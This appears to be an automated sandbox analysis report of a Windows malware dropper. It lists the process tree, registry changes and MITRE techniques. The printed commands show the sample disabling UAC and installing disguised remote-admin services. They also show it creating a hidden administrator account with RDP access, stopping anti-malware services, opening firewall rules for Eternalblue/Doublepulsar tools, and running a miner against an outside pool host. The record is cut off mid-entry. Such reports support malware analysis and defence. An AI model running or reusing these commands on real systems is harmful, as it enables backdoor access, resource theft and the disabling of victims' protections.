PID 976 wrote to memory of 556	976	WinMail.exe	99
PID 3976 wrote to memory of 2520	3976	sys.exe	101
PID 3976 wrote to memory of 2520	3976	sys.exe	101
PID 3976 wrote to memory of 2520	3976	sys.exe	101
PID 2520 wrote to memory of 2328	2520	cmd.exe	103
PID 2520 wrote to memory of 2328	2520	cmd.exe	103

System policy modification 1 TTPs 3 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	LtHv0O2KZDK4M637.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	LtHv0O2KZDK4M637.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	LtHv0O2KZDK4M637.exe

Views/modifies file attributes 1 TTPs 31 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
2500	attrib.exe
1796	attrib.exe
4560	attrib.exe
5092	attrib.exe
6068	attrib.exe
6044	attrib.exe
5892	attrib.exe
4712	attrib.exe
5696	attrib.exe
1132	attrib.exe
5792	attrib.exe
5272	attrib.exe
5108	attrib.exe
1640	attrib.exe
6064	attrib.exe
5428	attrib.exe
2896	attrib.exe
5472	attrib.exe
3956	attrib.exe
4196	attrib.exe
5744	attrib.exe
5188	attrib.exe
5432	attrib.exe
6008	attrib.exe
988	attrib.exe
5880	attrib.exe
5588	attrib.exe
5916	attrib.exe
6032	attrib.exe
5080	attrib.exe
5652	attrib.exe

C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe
"C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe"
1⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Checks whether UAC is enabled
- Modifies WinLogon
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1316
- C:\ProgramData\Microsoft\Intel\wini.exe
  C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
  2⤵
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:3692
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1564
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3268
    - - C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg1.reg"
        5⤵
        Runs .reg file with regedit
        
        PID:1140
    - - C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg2.reg"
        5⤵
        Runs .reg file with regedit
        
        PID:2576
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        5⤵
        Delays execution with timeout.exe
        
        PID:200
    - - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /silentinstall
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:2156
    - - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /firewall
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2092
    - - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /start
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:4080
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows\*.*
        5⤵
        Views/modifies file attributes
        
        PID:3956
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows
        5⤵
        Views/modifies file attributes
        
        PID:988
    - - C:\Windows\SysWOW64\sc.exe
        
        sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
        5⤵
        
        PID:1144
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config RManService obj= LocalSystem type= interact type= own
        5⤵
        
        PID:2284
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config RManService DisplayName= "Microsoft Framework"
        5⤵
        
        PID:2968
- - C:\ProgramData\Windows\winit.exe
    "C:\ProgramData\Windows\winit.exe"
    3⤵
    - Executes dropped EXE
    - Checks processor information in registry
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:4032
  - - C:\Program Files (x86)\Windows Mail\WinMail.exe
      "C:\Program Files (x86)\Windows Mail\WinMail" OCInstallUserConfigOE
      4⤵
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:976
    - - C:\Program Files\Windows Mail\WinMail.exe
        
        "C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
        5⤵
        Suspicious use of SetWindowsHookEx
        
        PID:556
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
      4⤵
      PID:4084
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 5
        5⤵
        Delays execution with timeout.exe
        
        PID:4088
- C:\ProgramData\install\sys.exe
  C:\ProgramData\install\sys.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Checks processor information in registry
  - Suspicious use of WriteProcessMemory
  PID:3976
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "sys.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2520
  - - C:\Windows\SysWOW64\timeout.exe
      C:\Windows\system32\timeout.exe 3
      4⤵
      Delays execution with timeout.exe
      PID:2328
- C:\programdata\install\cheat.exe
  C:\programdata\install\cheat.exe -pnaxui
  2⤵
  - Executes dropped EXE
  PID:640
- - C:\ProgramData\Microsoft\Intel\taskhost.exe
    "C:\ProgramData\Microsoft\Intel\taskhost.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Suspicious use of SetWindowsHookEx
    PID:3096
  - - C:\Programdata\RealtekHD\taskhostw.exe
      C:\Programdata\RealtekHD\taskhostw.exe
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      NTFS ADS
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of SetWindowsHookEx
      PID:1912
    - - C:\Programdata\WindowsTask\winlogon.exe
        
        C:\Programdata\WindowsTask\winlogon.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4248
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /C schtasks /query /fo list
        6⤵
        
        PID:4296
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /query /fo list
        7⤵
        
        PID:4348
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ipconfig /flushdns
        5⤵
        
        PID:4124
      - C:\Windows\system32\ipconfig.exe
        
        ipconfig /flushdns
        6⤵
        Gathers network information
        
        PID:2004
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c gpupdate /force
        5⤵
        
        PID:4396
      - C:\Windows\system32\gpupdate.exe
        
        gpupdate /force
        6⤵
        
        PID:4512
    - - C:\ProgramData\WindowsTask\audiodg.exe
        
        C:\ProgramData\WindowsTask\audiodg.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5304
    - - C:\ProgramData\WindowsTask\MicrosoftHost.exe
        
        C:\ProgramData\WindowsTask\MicrosoftHost.exe -o stratum+tcp://fontdrvhost.ru:3333 -u CPU --donate-level=1 -k -t1
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:3040
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny Администраторы:(F)
      4⤵
      PID:3500
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny Администраторы:(F)
        5⤵
        
        PID:724
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny System:(F)
      4⤵
      PID:352
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny System:(F)
        5⤵
        Modifies file permissions
        
        PID:3964
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny система:(F)
      4⤵
      PID:2056
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny система:(F)
        5⤵
        Modifies file permissions
        
        PID:3400
  - - C:\programdata\microsoft\intel\R8.exe
      C:\programdata\microsoft\intel\R8.exe
      4⤵
      Executes dropped EXE
      Modifies registry class
      Suspicious use of SetWindowsHookEx
      PID:4236
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
        5⤵
        
        PID:4388
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
        6⤵
        Modifies registry class
        
        PID:4456
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        7⤵
        Kills process with taskkill
        
        PID:4504
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        7⤵
        Kills process with taskkill
        
        PID:4544
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        7⤵
        Delays execution with timeout.exe
        
        PID:4576
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        7⤵
        
        PID:4748
        
        C:\rdp\Rar.exe
        
        "Rar.exe" e -p555 db.rar
        7⤵
        Executes dropped EXE
        
        PID:4792
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        7⤵
        Kills process with taskkill
        
        PID:4840
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        7⤵
        Delays execution with timeout.exe
        
        PID:4936
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
        7⤵
        
        PID:4380
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
        8⤵
        
        PID:4516
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
        9⤵
        
        PID:4688
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
        9⤵
        
        PID:4772
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
        9⤵
        
        PID:4804
        
        C:\Windows\SysWOW64\net.exe
        
        net.exe user "john" "12345" /add
        9⤵
        
        PID:4964
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user "john" "12345" /add
        10⤵
        
        PID:1360
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        9⤵
        
        PID:4992
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Администраторы" "John" /add
        9⤵
        
        PID:2064
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
        10⤵
        
        PID:1960
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administratorzy" "John" /add
        9⤵
        
        PID:3892
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
        10⤵
        
        PID:5036
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administrators" John /add
        9⤵
        
        PID:3396
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administrators" John /add
        10⤵
        
        PID:3816
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administradores" John /add
        9⤵
        
        PID:1524
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administradores" John /add
        10⤵
        
        PID:4048
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Пользователи удаленного рабочего стола" John /add
        9⤵
        
        PID:2004
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
        10⤵
        
        PID:992
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Пользователи удаленного управления" John /add
        9⤵
        
        PID:4376
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
        10⤵
        
        PID:4312
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Remote Desktop Users" John /add
        9⤵
        
        PID:940
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
        10⤵
        
        PID:4472
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Usuarios de escritorio remoto" John /add
        9⤵
        
        PID:4452
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
        10⤵
        
        PID:4580
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Uzytkownicy pulpitu zdalnego" John /add
        9⤵
        
        PID:4768
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
        10⤵
        
        PID:4764
        
        C:\rdp\RDPWInst.exe
        
        "RDPWInst.exe" -i -o
        9⤵
        Executes dropped EXE
        Modifies WinLogon
        Drops file in Program Files directory
        
        PID:4888
        
        C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        10⤵
        
        PID:556
        
        C:\rdp\RDPWInst.exe
        
        "RDPWInst.exe" -w
        9⤵
        Executes dropped EXE
        
        PID:2544
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
        9⤵
        
        PID:4264
        
        C:\Windows\SysWOW64\net.exe
        
        net accounts /maxpwage:unlimited
        9⤵
        
        PID:2844
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 accounts /maxpwage:unlimited
        10⤵
        
        PID:4480
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
        9⤵
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:5092
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\Program Files\RDP Wrapper"
        9⤵
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:5080
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\rdp"
        9⤵
        Views/modifies file attributes
        
        PID:4196
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        7⤵
        Delays execution with timeout.exe
        
        PID:4288
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc start appidsvc
      4⤵
      PID:4652
    - - C:\Windows\SysWOW64\sc.exe
        
        sc start appidsvc
        5⤵
        
        PID:4696
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc start appmgmt
      4⤵
      PID:4716
    - - C:\Windows\SysWOW64\sc.exe
        
        sc start appmgmt
        5⤵
        
        PID:4780
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
      4⤵
      PID:4860
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config appidsvc start= auto
        5⤵
        
        PID:4916
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
      4⤵
      PID:4956
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config appmgmt start= auto
        5⤵
        
        PID:5000
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete swprv
      4⤵
      PID:5020
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete swprv
        5⤵
        
        PID:5104
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop mbamservice
      4⤵
      PID:5032
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop mbamservice
        5⤵
        
        PID:3172
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
      4⤵
      PID:4100
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop bytefenceservice
        5⤵
        
        PID:3296
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
      4⤵
      PID:4140
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete bytefenceservice
        5⤵
        
        PID:4228
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete mbamservice
      4⤵
      PID:4324
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete mbamservice
        5⤵
        
        PID:4552
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete crmsvc
      4⤵
      PID:4808
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete crmsvc
        5⤵
        
        PID:4824
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete "windows node"
      4⤵
      PID:4876
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete "windows node"
        5⤵
        
        PID:4912
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer
      4⤵
      PID:3860
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop Adobeflashplayer
        5⤵
        
        PID:5060
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer
      4⤵
      PID:2508
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete AdobeFlashPlayer
        5⤵
        
        PID:4428
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop MoonTitle
      4⤵
      PID:4208
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop MoonTitle
        5⤵
        
        PID:4424
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete MoonTitle"
      4⤵
      PID:4816
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete MoonTitle"
        5⤵
        
        PID:4864
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64
      4⤵
      PID:4728
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop clr_optimization_v4.0.30318_64
        5⤵
        
        PID:3176
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"
      4⤵
      PID:4968
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete clr_optimization_v4.0.30318_64"
        5⤵
        
        PID:5056
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql
      4⤵
      PID:4116
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop MicrosoftMysql
        5⤵
        
        PID:1124
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql
      4⤵
      PID:968
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete MicrosoftMysql
        5⤵
        
        PID:4940
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
      4⤵
      PID:3596
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall set allprofiles state on
        5⤵
        
        PID:4308
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
      4⤵
      PID:1384
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
        5⤵
        
        PID:4404
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
      4⤵
      PID:4284
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
        5⤵
        
        PID:4812
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
      4⤵
      PID:4852
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
        5⤵
        
        PID:4368
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
      4⤵
      PID:4476
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
        5⤵
        
        PID:3600
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
      4⤵
      PID:5068
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
        5⤵
        
        PID:4988
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
      4⤵
      PID:2860
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
        5⤵
        
        PID:4420
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
      4⤵
      PID:4272
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
        5⤵
        
        PID:4372
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
      4⤵
      PID:4488
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
        5⤵
        
        PID:4800
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
      4⤵
      PID:4884
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
        5⤵
        
        PID:3952
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
      4⤵
      PID:4064
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
        5⤵
        
        PID:4972
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
      4⤵
      PID:4268
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
        5⤵
        
        PID:4528
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
      4⤵
      PID:4572
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
        5⤵
        
        PID:4776
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
      4⤵
      PID:4920
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
        5⤵
        
        PID:4460
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
      4⤵
      PID:4900
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
        5⤵
        
        PID:4108
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
      4⤵
      PID:5052
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
        5⤵
        
        PID:1420
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
      4⤵
      PID:4960
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
        5⤵
        
        PID:4492
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
      4⤵
      PID:4740
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
        5⤵
        
        PID:5004
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
      4⤵
      PID:4252
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
        5⤵
        
        PID:4508
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
      4⤵
      PID:3924
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
        5⤵
        
        PID:496
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
      4⤵
      PID:4660
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
        5⤵
        
        PID:400
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP1" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.255
      4⤵
      PID:2564
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP1" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.255
        5⤵
        
        PID:4520
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP2" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.255
      4⤵
      PID:5116
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP2" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.255
        5⤵
        
        PID:4868
  - - C:\Windows\SysWOW64\cmd.exe
